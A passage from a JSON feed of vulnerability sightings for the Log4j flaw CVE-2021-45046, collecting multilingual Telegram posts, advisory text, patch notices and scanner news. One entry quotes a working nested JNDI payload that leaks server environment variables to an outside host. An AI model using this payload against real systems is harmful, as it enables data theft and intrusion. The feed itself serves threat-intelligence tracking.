\u0441\u0430\u043c\u043e\u0440\u0435\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u043c \u043f\u043e\u0438\u0441\u043a\u0435\nJNDI, \u043a\u043e\u0442\u043e\u0440\u044b\u0439, \u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0431\u044b, \u0431\u044b\u043b \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d \u0432 \u0432\u0435\u0440\u0441\u0438\u0438 2. 16, \u043d\u043e \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0441\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u043c \u043f\u0440\u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043e\u0431\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430\u0445 \u0438 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u043b \u043a \u043e\u0448\u0438\u0431\u043a\u0435\nStackOverflowError. \u0412\u0435\u0440\u0441\u0438\u044f\n\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0430 \u043d\u0430 \u043a\u0440\u0443\u043f\u043d\u0435\u0439\u0448\u0435\u043c\nJava-\u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 -\nMaven Central. \u0412\u044b\u043f\u0443\u0441\u043a 2. 12. 3 \u0442\u0430\u043a\u0436\u0435 \u043d\u0430 \u043f\u043e\u0434\u0445\u043e\u0434\u0435 \u0434\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0435\u0442\u043a\u0438 \u0410\u0431\u0441\u0442\u0440\u0430\u0433\u0438\u0440\u0443\u044f\u0441\u044c \u043e\u0442 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043f\u043e\n\u0434\u0430\u043d\u043d\u044b\u043c\nGoogle, \u0431\u043e\u043b\u0435\u0435 35 000 \u043f\u0430\u043a\u0435\u0442\u043e\u0432\nJava \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\nlog4j, \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0445 \u0431\u043e\u043b\u0435\u0435 8 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f\nMaven\nCentral. \u0411\u043e\u043b\u044c\u0448\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u0438\u0437 \u043f\u0430\u043a\u0435\u0442\u043e\u0432 \u0437\u0430\u0438\u043c\u0441\u0442\u0432\u0443\u044e\u0442 \u0431\u0430\u0433\u0438\nlog4j \u00ab\u043a\u043e\u0441\u0432\u0435\u043d\u043d\u043e\u00bb \u043f\u043e \u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0443 \u0442\u0440\u0430\u043d\u0437\u0438\u0442\u0438\u0432\u043d\u043e\u0439 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0438\u0437 35 863 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445\nGoogle \u043f\u0430\u043a\u0435\u0442\u043e\u0432, \u043e\u043a\u043e\u043b\u043e 7000 \u0437\u0430\u0438\u043c\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0438\nlog4j \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e. \u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438\nGoogle \u043f\u0440\u043e\u0433\u043d\u043e\u0437\u0438\u0440\u0443\u044e\u0442, \u0447\u0442\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u0432 log4j \u0437\u0430\u0442\u044f\u043d\u0435\u0442\u0441\u044f \u043d\u0430 \u0433\u043e\u0434\u044b. \n \u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c, \u0432 \u043d\u044b\u043d\u0435\u0448\u043d\u0438\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445 \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u0439\nlog4j \u0438 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0442\u044c \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u0442\u044c\nApache \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439.   @biznesovyy_zhurnal\n    \u0422\u0430\u043a\u0436\u0435 \u043f\u043e \u044d\u0442\u043e\u0439 \u0442\u0435\u043c\u0435 \u043c\u043e\u0436\u0435\u0442\u0435 \u043f\u043e\u0447\u0438\u0442\u0430\u0442\u044c https://t.me/ehkho_ot_mosvy/21746", "creation_timestamp": "2021-12-20T13:35:36.000000Z"}, {"uuid": "20002ee0-4c53-4bfa-8027-f6b32899c9f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/tech_b0lt_Genona/2947", "content": "\u041c\u044b \u0434\u0443\u043c\u0430\u043b\u0438, \u0447\u0442\u043e \u0432\u0441\u0451, \u043d\u043e \u044d\u0442\u043e \u043d\u0435 \u0432\u0441\u0451. \u0422\u0435\u043f\u0435\u0440\u044c \u0441 log4j \u0435\u0449\u0451 \u0434\u043e\u043b\u0433\u043e \u0432\u0440\u0435\u043c\u044f \u043d\u0435 \u0441\u043b\u0435\u0437\u0443\u0442. \u041f\u043e\u043a\u0430 \"\u0432\u0441\u0435\" \u0431\u0430\u0433\u0438 \u0442\u0430\u043c \u043d\u0435 \u043d\u0430\u0439\u0434\u0443\u0442.\n\nLog4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046)\nhttps://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/\n+\nIt was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property `log4j2.noFormatMsgLookup` to `true` do NOT mitigate this specific vulnerability. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. This issue can be mitigated in prior releases (<2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-45046", "creation_timestamp": "2021-12-15T09:21:34.000000Z"}, {"uuid": "5987ddaa-2889-44b1-a826-92ed775b4c20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/tech_b0lt_Genona/2965", "content": "\u0412\u0441\u0442\u0440\u0435\u0447\u0430 \u0441 CVE-2021-44228 \u0438\u043c\u0435\u043d\u0438 Log4j2 \u0432 \u043d\u0435\u043e\u0436\u0438\u0434\u0430\u043d\u043d\u043e\u043c \u043c\u0435\u0441\u0442\u0435\n\n> After the initial fix in Log4j v2.15 was released, a new issue CVE-2021-45046 was found and addressed in log4j v2.16. We have since released Arduino IDE 1.8.18, available here, which includes log4j v2.16 with the latest fix.\n\nArduino's response to Log4j2 vulnerability CVE-2021-44228\nhttps://support.arduino.cc/hc/en-us/articles/4412377144338-Arduino-s-response-to-Log4j2-vulnerability-CVE-2021-44228", "creation_timestamp": "2022-01-04T11:40:02.000000Z"}, {"uuid": "a82d93bb-7e70-4c37-9ee1-58e6edaf5aed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1833", "content": "", "creation_timestamp": "2026-04-21T21:00:00.000000Z"}, {"uuid": "208b1bed-59b2-4259-8743-b3e7a0b720d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/ics_cert/507", "content": "\u0641\u0648\u0631\u06cc: \u0628\u0646\u06cc\u0627\u062f \u0622\u067e\u0627\u0686\u06cc \u0648\u0635\u0644\u0647 \u062c\u062f\u06cc\u062f\u06cc (CVE-2021-45046) \u0628\u0631\u0627\u06cc \u0627\u0628\u0632\u0627\u0631 #Log4j \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a\u060c \u067e\u0633 \u0627\u0632 \u0627\u06cc\u0646\u06a9\u0647 \u0648\u0635\u0644\u0647 \u0642\u0628\u0644\u06cc \u0628\u0631\u0627\u06cc \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc #Log4Shell \u0627\u062e\u06cc\u0631\u0627\u064b \u0641\u0627\u0634 \u0634\u062f\u0647 (CVE-2021-44228) \u062f\u0631 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0647\u0627\u06cc \u063a\u06cc\u0631 \u067e\u06cc\u0634 \u0641\u0631\u0636 \u0646\u0627\u0642\u0635 \u062a\u0644\u0642\u06cc \u0634\u062f.\n\n \u062c\u0632\u0626\u06cc\u0627\u062a: https://lnkd.in/eFjkK6Zv\n\n #infosec #\u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc #\u0627\u0645\u0646\u06cc\u062a \u06a9\u0627\u0645\u067e\u06cc\u0648\u062a\u0631\u06cc #\u0641\u0646\u0627\u0648\u0631\u06cc\n\n\ud83d\udc6e\u200d\u2640\ufe0f\ud83d\udc6e\u200d\u2640\ufe0f \u0628\u0627\u0632\u0646\u0634\u0631 \u0645\u0637\u0627\u0644\u0628 \u0627\u06cc\u0646 \u06a9\u0627\u0646\u0627\u0644 \u0635\u0631\u0641\u0627 \u0628\u0627 \u0630\u06a9\u0631 \u0645\u0646\u0628\u0639 \u0648 \u0622\u062f\u0631\u0633 \u06a9\u0627\u0645\u0644 \u06a9\u0627\u0646\u0627\u0644 \u0645\u062c\u0627\u0632 \u0645\u06cc\u0628\u0627\u0634\u062f.\n\n\ud83c\udfed\u0648\u0628\u0633\u0627\u06cc\u062a \u0648 \u06a9\u0627\u0646\u0627\u0644 \u062a\u062e\u0635\u0635\u06cc \u0627\u0645\u0646\u06cc\u062a \u0632\u06cc\u0631\u0633\u0627\u062e\u062a\u0647\u0627\u06cc \u0627\u062a\u0648\u0645\u0627\u0633\u06cc\u0648\u0646 \u0648 \u06a9\u0646\u062a\u0631\u0644 \u0635\u0646\u0639\u062a\u06cc\n\n\u0627\u062f\u0645\u06cc\u0646:\nhttps://t.me/pedram_kiani\n\u06a9\u0627\u0646\u0627\u0644 \u062a\u0644\u06af\u0631\u0627\u0645:\nhttps://t.me/ics_cert", "creation_timestamp": "2021-12-15T12:20:56.000000Z"}, {"uuid": "86504ec9-4cad-473f-95c6-1023993ff58c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/komissar_katani/98053", "content": "\u0422\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Apache log4j\n\n Log4jshell CVE-2021-44228 \u0418\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 JNDI \u0432 Apache Log4j2 2.0-beta9 (\u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 2.14.1) \u0432 \u043a\u043e\u043c\u0431\u0438\u043d\u0430\u0446\u0438\u0438 \u0441 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u043c LDAP \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u043e\u0442\u043a\u0443\u0434\u0430 \u0443\u0433\u043e\u0434\u043d\u043e. \u0425\u0430\u043a\u0435\u0440 \u043c\u043e\u0436\u0435\u0442 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u043c\u0438 \u0436\u0443\u0440\u043d\u0430\u043b\u0430 \u0438\u043b\u0438 \u0438\u0445 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434, \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 LDAP. CVE-2021-45046 \u0411\u044b\u043b\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e, \u0447\u0442\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 CVE-2021-44228 \u0432 Apache Log4j 2.15.0 \u0431\u044b\u043b\u043e \u043d\u0435\u043f\u043e\u043b\u043d\u044b\u043c \u043f\u0440\u0438 \u0432\u044b\u0431\u043e\u0440\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u043d\u0435 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e. \u0415\u0441\u043b\u0438 \u043f\u0440\u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0436\u043e\u043d\u0433\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0439 \u0448\u0430\u0431\u043b\u043e\u043d \u0441 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u043d\u044b\u043c \u043f\u043e\u0438\u0441\u043a\u043e\u043c (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u00ab$${ctx:LoginID}\u00bb), \u0445\u0430\u043a\u0435\u0440\u044b, \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u0432\u0445\u043e\u0434\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 Thread Context Map (MDC), \u0441\u043f\u043e\u0441\u043e\u0431\u043d\u044b \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u044b \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0448\u0430\u0431\u043b\u043e\u043d\u0430 JNDI Lookup. \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0443\u0442\u0435\u0447\u043a\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438 \u0434\u0430\u0451\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b... \n\n http://forumpolitika.org/component/k2/item/87406 \n\n\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: @politicheskie_panchi \u0438 @kz_vzglyd", "creation_timestamp": "2023-08-11T01:57:33.000000Z"}, {"uuid": "ab35c788-8a1c-4dab-85f3-ffe3149dd852", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BleepingComputer/11213", "content": "CISA releases Apache Log4j scanner to find vulnerable apps\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has announced the release of a scanner for identifying web services impacted by& two Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046. [...]\n\nhttps://www.bleepingcomputer.com/news/security/cisa-releases-apache-log4j-scanner-to-find-vulnerable-apps/", "creation_timestamp": "2021-12-22T16:57:09.000000Z"}, {"uuid": "94c93555-875d-49cd-8cf0-28b22ad3103b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/mosqua_na_mosque_reke/52012", "content": "\u0422\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Apache log4j\n\n Log4jshell CVE-2021-44228 \u0418\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 JNDI \u0432 Apache Log4j2 2.0-beta9 (\u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 2.14.1) \u0432 \u043a\u043e\u043c\u0431\u0438\u043d\u0430\u0446\u0438\u0438 \u0441 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u043c LDAP \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u043e\u0442\u043a\u0443\u0434\u0430 \u0443\u0433\u043e\u0434\u043d\u043e. \u0425\u0430\u043a\u0435\u0440 \u043c\u043e\u0436\u0435\u0442 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u043c\u0438 \u0436\u0443\u0440\u043d\u0430\u043b\u0430 \u0438\u043b\u0438 \u0438\u0445 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434, \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 LDAP. CVE-2021-45046 \u0411\u044b\u043b\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e, \u0447\u0442\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 CVE-2021-44228 \u0432 Apache Log4j 2.15.0 \u0431\u044b\u043b\u043e \u043d\u0435\u043f\u043e\u043b\u043d\u044b\u043c \u043f\u0440\u0438 \u0432\u044b\u0431\u043e\u0440\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u043d\u0435 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e. \u0415\u0441\u043b\u0438 \u043f\u0440\u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0436\u043e\u043d\u0433\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0439 \u0448\u0430\u0431\u043b\u043e\u043d \u0441 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u043d\u044b\u043c \u043f\u043e\u0438\u0441\u043a\u043e\u043c (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u00ab$${ctx:LoginID}\u00bb), \u0445\u0430\u043a\u0435\u0440\u044b, \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u0432\u0445\u043e\u0434\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 Thread Context Map (MDC), \u0441\u043f\u043e\u0441\u043e\u0431\u043d\u044b \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u044b \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0448\u0430\u0431\u043b\u043e\u043d\u0430 JNDI Lookup. \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0443\u0442\u0435\u0447\u043a\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438 \u0434\u0430\u0451\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b... \n\n http://forumpolitika.org/component/k2/item/87406 \n\n\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: @fib_name \u0438 @tass_kgb", "creation_timestamp": "2023-08-12T19:09:56.000000Z"}, {"uuid": "493a7c66-20c4-49ee-a065-6d895f212109", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "Telegram/EYkASGxj3Tiuz3kIHRMz13gpRd2GwQ5wKmXB5D8I7ZTChs4", "content": "", "creation_timestamp": "2025-07-23T21:00:04.000000Z"}, {"uuid": "d7b99691-428f-4eba-a00d-e50536189cce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/alexmakus/4446", "content": "\u0411\u043e\u043b\u044c\u0448\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 log4j \u0431\u043e\u0433\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439! \n\nhttps://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/", "creation_timestamp": "2021-12-15T11:24:18.000000Z"}, {"uuid": "a24f6248-24cc-4076-a662-240cb0e87022", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/beaverdreamer/36", "content": "#log4j #slowpoke\n\u041e\u0431\u0449\u0438\u0435 \u0441\u0442\u0430\u0442\u044c\u0438:\nhttps://www.lunasec.io/docs/blog/log4j-zero-day/\nhttps://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/\n\n\u0421\u0442\u0430\u0442\u044c\u044f \u0441 \u0442\u043e\u0447\u043a\u0438 \u0437\u0440\u0435\u043d\u0438\u044f \u0437\u0430\u0449\u0438\u0442\u044b (\u043d\u043e \u043c\u043e\u0436\u043d\u043e \u0432\u0437\u044f\u0442\u044c \u043f\u0435\u0439\u043b\u043e\u0430\u0434\u043e\u0432):\nhttps://securityblue.team/log4j-hunting-and-indicators/\n\n\u041e\u0431\u0445\u043e\u0434\u043d\u044b\u0435 \u0441\u043f\u043e\u0441\u043e\u0431\u044b \u0437\u0430\u0449\u0438\u0442\u044b: https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide\n\nJDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector. \n\n\nIn case anyone hasn't discovered this. The Log4J formatting is nestable which means payloads like\n ${jndi:ldap://${env:user}.xyz.collab.com/a} \nWill leak server side env vars!\n\n\u0412\u0430\u0440\u0438\u0430\u043d\u0442\u044b \u043f\u0435\u0439\u043b\u043e\u0430\u0434\u043e\u0432:\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/blob/0d6d6049ce03272d6e934247ab57263bc04ea625/CVE%20Exploits/Log4Shell.md", "creation_timestamp": "2024-03-04T10:40:25.000000Z"}, {"uuid": "0ce15428-2bdb-49e5-9b73-6fb663648ae7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "Telegram/vHTtKQxmAT3f8pPJYMyZLW3MJn_6GFVTdkZIulMbNHlsBg", "content": "", "creation_timestamp": "2023-11-22T10:27:55.000000Z"}, {"uuid": "4671acc4-858b-4a93-9bd5-c6c30fd68dc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/ctinow/43919", "content": "Second Log4j Vulnerability (CVE-2021-45046) Discovered \u2014 New Patch Released\n\nhttps://ift.tt/3IT5WFC", "creation_timestamp": "2021-12-15T06:36:05.000000Z"}, {"uuid": "56d63151-918c-4309-98e9-8ad25be20986", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/KomunitiSiber/136", "content": "Alert: Active Exploitation of TP-Link, Apache, and Oracle Vulnerabilities Detected\nhttps://thehackernews.com/2023/05/active-exploitation-of-tp-link-apache.html\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) has\u00a0added\u00a0three flaws to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.\nThe security vulnerabilities are as follows -\n\nCVE-2023-1389\u00a0(CVSS score: 8.8) - TP-Link Archer AX-21 Command Injection Vulnerability\nCVE-2021-45046\u00a0(CVSS score: 9.0) - Apache Log4j2 Deserialization of Untrusted", "creation_timestamp": "2023-05-02T08:03:43.000000Z"}, {"uuid": "17b91d97-f58a-4fd4-8771-5a93a93f8450", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/arpsyndicate/4393", "content": "#ExploitObserverAlert\n\nCVE-2021-45046\n\nDESCRIPTION: Exploit Observer has 318 entries in 20 file formats related to CVE-2021-45046. It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 